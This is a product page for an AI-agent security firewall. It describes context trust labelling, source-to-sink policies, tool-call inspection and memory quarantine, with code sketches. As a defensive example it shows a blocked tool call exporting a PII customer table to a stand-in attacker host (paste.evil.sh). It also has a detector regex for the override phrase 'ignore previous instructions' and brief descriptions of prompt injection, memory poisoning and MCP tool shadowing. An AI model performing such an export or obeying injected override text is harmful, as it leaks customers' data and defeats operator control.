For CTOs · VP Engineering · AI leads

Ship AI agents with a security harness, not hope.

Ultra13 gives engineering teams offensive agent testing, context-aware runtime controls, and regression validation for agents that use RAG, memory, MCP, APIs, code execution, browsers, and internal tools.

Review the Architecture · Run a Teardown on One Agent

Where Ultra13 sits

External / user content

untrusted by default

Input classification + trust labelling

provenance attached to every span

Prompt / context assembly

what the model is allowed to see

RAG · memory · MCP · tool descriptions

evidence, not instruction

Ultra13 Context Firewall

source-to-sink policy + decisions

Model / agent loop

plan → tool → observe → act

Tool gateway / action gateway

inspected before execution

Audit log + validation harness

replayable, regression-tested
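
The first stages of this pipeline (classification, trust labelling, context assembly) can be sketched in a few lines. This is a minimal illustration only: the `Span` type, the `Trust` levels, the `SOURCE_TRUST` mapping, and the `[evidence]` markers are hypothetical names chosen for the example, not Ultra13's API.

```python
from dataclasses import dataclass
from enum import Enum


class Trust(Enum):
    TRUSTED = "trusted"      # e.g. system prompt, operator config
    USER = "user"            # the authenticated end user
    UNTRUSTED = "untrusted"  # web pages, RAG chunks, MCP output


@dataclass(frozen=True)
class Span:
    text: str
    source: str  # where the text came from, e.g. "web", "rag", "user"
    trust: Trust


# Hypothetical mapping: any source not listed is untrusted by default.
SOURCE_TRUST = {"system": Trust.TRUSTED, "user": Trust.USER}


def label(text: str, source: str) -> Span:
    """Attach provenance and a trust label to a piece of content."""
    return Span(text, source, SOURCE_TRUST.get(source, Trust.UNTRUSTED))


def assemble(spans: list[Span]) -> str:
    """Render spans so untrusted text is fenced off as evidence."""
    parts = []
    for s in spans:
        if s.trust is Trust.UNTRUSTED:
            parts.append(f"[evidence source={s.source}]\n{s.text}\n[/evidence]")
        else:
            parts.append(s.text)
    return "\n".join(parts)
```

Keeping the label on the span, rather than on the assembled string, is what lets later stages ask which source influenced a given action.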

Control points

Enforcement where it actually matters.

The firewall is not a wrapper around the prompt. It sits at every boundary the agent crosses.

Prompt / context assembly

Decide what the model is allowed to see for this request.

Retrieved context

Treat RAG chunks as untrusted evidence with per-source policy.

Memory reads / writes

Gate what becomes persistent, and what it’s allowed to authorize.

MCP responses

Validate tool descriptions and responses; catch rug-pulls and shadowing.

Tool calls

Inspect name, args, identity, tenant, data class, and side effects.

Outbound actions

Control egress, exports, webhooks, shell, and code execution.
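
One common way to catch the MCP rug-pulls and shadowing mentioned above is to pin a fingerprint of each tool description at approval time and compare it on every listing. The sketch below assumes a hypothetical dict shape for advertised tools (`server`, `name`, `description`). It illustrates the technique, not Ultra13's implementation.

```python
import hashlib


def fingerprint(name: str, description: str) -> str:
    """Stable hash of a tool's name and description."""
    return hashlib.sha256(f"{name}\n{description}".encode("utf-8")).hexdigest()


def check_tools(pinned: dict[str, str], advertised: list[dict]) -> list[str]:
    """Compare advertised tools against fingerprints pinned at approval time.

    `pinned` maps tool name -> fingerprint. Each advertised tool is a dict
    with "server", "name", and "description" keys (a hypothetical shape).
    """
    findings = []
    seen = {}  # tool name -> server that first advertised it
    for tool in advertised:
        name, server = tool["name"], tool["server"]
        if name in seen and seen[name] != server:
            findings.append(f"shadowing: {name} offered by {seen[name]} and {server}")
        seen.setdefault(name, server)
        expected = pinned.get(name)
        if expected is None:
            findings.append(f"unpinned: {name}")
        elif expected != fingerprint(name, tool["description"]):
            findings.append(f"rug-pull: {name} description changed since approval")
    return findings
```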

Source-to-sink policy

Which context can influence which action.

External web content can answer a question — but it cannot authorize a database export, a shell command, or an outbound webhook. You declare the boundary; the firewall enforces it.

policy/source-to-sink.rego

allow            sink=answer        from={user, rag, web, mcp}
deny             sink=db.export     from={web, rag, mcp, memory}
deny             sink=shell.exec    from=*            unless approved
deny             sink=webhook.post  from={web, rag}   # block egress
require_approval sink=*.write       when data_class=PII
treat            retrieved_context  as evidence not instruction
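
To make the evaluation order concrete, here is a rough Python sketch of how the first five rules in the listing could be checked. The tuple layout, the `evaluate` function, and the default-deny fallback are assumptions made for illustration. The listing itself does not say what happens when no rule matches.

```python
from fnmatch import fnmatch

# Each rule: (effect, sink pattern, sources or None for "any", condition).
# Transcribed by hand from the policy listing; the tuple layout is our own.
RULES = [
    ("deny", "db.export", {"web", "rag", "mcp", "memory"}, None),
    ("deny", "shell.exec", None, "unless_approved"),
    ("deny", "webhook.post", {"web", "rag"}, None),
    ("require_approval", "*.write", None, "pii"),
    ("allow", "answer", {"user", "rag", "web", "mcp"}, None),
]


def evaluate(sink, sources, data_class=None, approved=False):
    """Return "allow", "deny", or "require_approval" for one action.

    `sources` is the set of context origins that influenced the action.
    """
    for effect, pattern, rule_sources, condition in RULES:
        if not fnmatch(sink, pattern):
            continue
        if condition == "pii" and data_class != "PII":
            continue
        if effect == "allow":
            # Allow only if every influencing source is on the list.
            if sources <= rule_sources:
                return "allow"
            continue
        if rule_sources is None or sources & rule_sources:
            # An explicit approval lifts approval-gated rules.
            if approved and (condition == "unless_approved" or effect == "require_approval"):
                return "allow"
            return effect
    return "deny"  # assumption: default-deny when no rule matches
```

Note that a deny rule fires if any listed source touched the action, so mixing user input with web content does not launder the web content's influence.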

Tool-call inspection

Inspect the call before it runs.

Tool name, arguments, target resource, user identity, tenant, data classification, side effects, and the trust of the context that requested it — evaluated against policy, then a decision.

firewall.inspect(tool_call) → BLOCK

tool_name: database.export
arguments: {
  table: "customers"
  format: "csv"
  destination: "https://paste.evil.sh/x"
}
user_identity: svc-agent@app
tenant_id: acme-prod
data_classification: PII · restricted
side_effects: bulk_read · network_egress
origin_trust: external (web content)
policy_decision: BLOCK

// source-to-sink: external context cannot authorize a bulk PII export to an untrusted destination
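
The same decision can be reproduced with a small Python sketch. The field names mirror the example above. The `ToolCall` dataclass, the `inspect_call` function, and the `ALLOWED_HOSTS` allowlist are hypothetical and stand in for whatever the real `firewall.inspect` does.

```python
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hypothetical egress allowlist; a real deployment would load this from policy.
ALLOWED_HOSTS = {"exports.internal.example"}


@dataclass
class ToolCall:
    tool_name: str
    arguments: dict
    user_identity: str
    tenant_id: str
    data_classification: set = field(default_factory=set)
    side_effects: set = field(default_factory=set)
    origin_trust: str = "external"  # "external" or "internal" in this sketch


def inspect_call(call: ToolCall) -> tuple[str, list[str]]:
    """Return (decision, reasons) for a proposed tool call."""
    reasons = []
    if call.origin_trust == "external" and "PII" in call.data_classification:
        reasons.append("external context cannot authorize access to PII")
    dest = call.arguments.get("destination")
    if "network_egress" in call.side_effects and dest:
        host = urlparse(dest).hostname
        if host not in ALLOWED_HOSTS:
            reasons.append(f"destination {host} is not on the egress allowlist")
    return ("BLOCK" if reasons else "ALLOW", reasons)


call = ToolCall(
    tool_name="database.export",
    arguments={"table": "customers", "format": "csv",
               "destination": "https://paste.evil.sh/x"},
    user_identity="svc-agent@app",
    tenant_id="acme-prod",
    data_classification={"PII", "restricted"},
    side_effects={"bulk_read", "network_egress"},
    origin_trust="external",
)
decision, reasons = inspect_call(call)
```

Returning the reasons alongside the decision keeps each block explainable in the audit log.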

Memory safety

Poisoned memory never becomes standing instruction.

Untrusted memory is quarantined and trust-labelled, with TTLs on what can persist. A note an attacker planted last session can’t silently authorize an action in this one.

trust-label · quarantine · ttl · no implicit auth
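
As an illustration of trust labels, TTLs, and "no implicit auth" working together, the sketch below models a tiny memory store. The class names and the TTL defaults are assumptions made for the example, not product settings.

```python
import time
from dataclasses import dataclass


@dataclass
class MemoryEntry:
    text: str
    trusted: bool      # trust label assigned at write time
    expires_at: float  # absolute expiry, seconds since the epoch


class MemoryStore:
    # TTL defaults are illustrative assumptions only.
    def __init__(self, untrusted_ttl: float = 3600.0, trusted_ttl: float = 30 * 86400.0):
        self._entries = []
        self._ttl = {False: untrusted_ttl, True: trusted_ttl}

    def write(self, text, trusted, now=None):
        now = time.time() if now is None else now
        self._entries.append(MemoryEntry(text, trusted, now + self._ttl[trusted]))

    def read(self, now=None):
        """Return live entries; expired ones are dropped."""
        now = time.time() if now is None else now
        self._entries = [e for e in self._entries if e.expires_at > now]
        return list(self._entries)

    def can_authorize(self, entry: MemoryEntry) -> bool:
        """Untrusted memory may inform answers but never authorize actions."""
        return entry.trusted
```

The `now` parameter exists so that expiry can be tested deterministically without waiting on the clock.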

Continuous validation

Regression tests for agent security.

Re-run the offensive suite whenever the model, prompt, retrieval source, tool, or policy changes. Every change resets the risk posture — so every change gets re-tested.

model swap · prompt change · new tool · new source · policy diff
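
One simple way to wire such a trigger into CI is to fingerprint the five inputs listed above and re-run the suite whenever the fingerprint changes. The config keys and function names below are hypothetical. This is a sketch of the idea, not the Ultra13 harness.

```python
import hashlib
import json

# The change types named above, as hypothetical config keys.
TRACKED = ("model", "prompt", "tools", "sources", "policy")


def posture_fingerprint(config: dict) -> str:
    """Hash the parts of an agent whose change should trigger a re-test."""
    tracked = {k: config.get(k) for k in TRACKED}
    canonical = json.dumps(tracked, sort_keys=True)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def changed_fields(old: dict, new: dict) -> list[str]:
    """List tracked fields that differ between two configurations."""
    return [k for k in TRACKED if old.get(k) != new.get(k)]


def needs_retest(old: dict, new: dict) -> bool:
    """True when any tracked input differs from the last tested state."""
    return posture_fingerprint(old) != posture_fingerprint(new)
```

Storing the fingerprint with each test run also makes it easy to show which configuration a given result applies to.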

Integrations

Framework-neutral by design.

Ultra13 wraps the boundaries, not your framework. Bring whatever stack your agents already run on.

OpenAI · Anthropic · Bedrock · LangChain · LlamaIndex · Custom agents · MCP · REST APIs · Vector DBs · Internal tools

In the path

Inline, without inheriting new risk.

Drop it between your agent and the world without a new model dependency, a new token bill, or a new region problem.

Deterministic-first screening

Fast deterministic detectors run first, then a purpose-built specialist classifier checks what passes; no generative LLM judge sits in the hot path. The two tiers fail open: if the classifier is unavailable, screening falls back to the detectors alone and never quarantines clean traffic.
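
A minimal sketch of that two-tier, fail-open flow might look like the following. The regex detectors are toy placeholders, and `classifier` is any callable you supply. Neither reflects the actual detectors or classifier in the product.

```python
import re

# Hypothetical deterministic detectors; real ones would be far broader.
DETECTORS = [
    re.compile(r"ignore (all )?previous instructions", re.IGNORECASE),
    re.compile(r"BEGIN (RSA|OPENSSH) PRIVATE KEY"),
]


def detect(text: str) -> bool:
    """Tier 1: cheap pattern checks. True means the text is flagged."""
    return any(p.search(text) for p in DETECTORS)


def screen(text: str, classifier=None) -> str:
    """Return "block" or "pass" using detectors first, then the classifier."""
    if detect(text):
        return "block"
    if classifier is None:
        return "pass"
    try:
        return "block" if classifier(text) else "pass"
    except Exception:
        # Fail-open: a classifier outage falls back to the detector verdict,
        # which at this point is "pass".
        return "pass"
```

The trade-off of failing open is that an outage reduces coverage to tier 1. A stricter deployment could choose to fail closed for high-risk sinks.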

Your model stays yours

The firewall fronts your agent and screens the boundary — bring your own model, keys, and provider bill. We screen the traffic; we never proxy-resell tokens or replace your model.

Choose your region

Run the managed service in the USA, EU, or UK for data residency — or self-host the data plane in your own VPC for full control.

Performance

Fast enough to leave in the request path.

The deterministic screening tier is CPU-cheap — measured on a single core, not estimated.

≈ 0.15 ms

deterministic screening CPU / request · p99 ≈ 0.19 ms

≈ 0.29 ms

end-to-end through the proxy · p99 ≈ 0.5 ms

< 0.1%

added latency vs. a typical LLM call, imperceptible to a user

Inline SDK adds only screening CPU — no network hop. A quota rule adds one ~0.1–0.2 ms Redis round-trip; the opt-in classifier and OCR tiers add inference only when enabled.
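
To sanity-check the relative-latency figure against your own traffic, the arithmetic is simple: overhead divided by LLM call time. The call durations below are assumed values for illustration; the page does not state what a typical call takes.

```python
PROXY_OVERHEAD_MS = 0.29  # end-to-end figure quoted above


def overhead_pct(llm_call_ms: float, overhead_ms: float = PROXY_OVERHEAD_MS) -> float:
    """Added latency as a percentage of the LLM call duration."""
    return 100.0 * overhead_ms / llm_call_ms


# Assumed LLM call durations, for illustration only.
for llm_ms in (290, 500, 2000):
    print(f"{llm_ms} ms call -> {overhead_pct(llm_ms):.3f}% added")
```

By this arithmetic, the added latency stays under 0.1% for any call longer than about 290 ms.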

Give us one workflow and one toolchain. We’ll show you where it breaks.

A technical teardown, context firewall controls, and a regression harness for the agent you’re shipping.

Start Technical Teardown · Explore the Firewall